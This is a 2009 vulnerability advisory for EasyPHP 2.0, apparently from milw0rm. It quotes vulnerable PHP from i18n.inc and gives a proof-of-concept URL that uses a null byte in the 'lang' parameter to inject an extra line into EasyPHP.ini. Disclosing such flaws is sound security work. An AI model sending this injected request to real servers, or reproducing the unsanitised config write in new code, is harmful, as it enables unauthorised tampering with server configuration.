40 lines
No EOL
1.2 KiB
Text
40 lines
No EOL
1.2 KiB
Text
Bug : Arbitrary Modify Configuration File
|
|
Vendor : EasyPHP
|
|
Vendor URI : http://sourceforge.net/projects/quickeasyphp/
|
|
Product : EasyPHP 2.0
|
|
Author : Zigma [zigmatn @ gmail.com]
|
|
http://NullArea.NET
|
|
|
|
Description :
|
|
|
|
EasyPHP is a WAMP software bundle that installs web server services onto the Windows computer and allows quick-and-easy development of PHP and MySQL on a localhost (also known as 127.0.0.1).
|
|
The package includes an Apache server, a MySQL database, and the PHP extension.
|
|
|
|
[+] Analyis :
|
|
|
|
A slight look on i18n.inc
|
|
|
|
if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
|
|
{
|
|
$fp = fopen($filename, "r");
|
|
$ini_contents = fread($fp, filesize($filename));
|
|
fclose($fp);
|
|
$ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); <--
|
|
$fp = fopen($filename, "w");
|
|
fputs($fp,$ini_contents);
|
|
fclose($fp);
|
|
Header("Location: " . $_SERVER['PHP_SELF']);
|
|
exit;
|
|
}
|
|
|
|
EasyPHP does not verify user Input ( Lang parameter ) wich leads to arbitrary overwrite EasyPHP configuration file (EasyPHP.ini) .
|
|
|
|
[+] Proof Of Concept :
|
|
|
|
The request :
|
|
|
|
http://localhost/index.php?lang=fr%00Lang=Overwritten
|
|
|
|
Results in overwriting EasyPHP.ini Adding the string "Lang=Overwritten".
|
|
|
|
# milw0rm.com [2009-05-11] |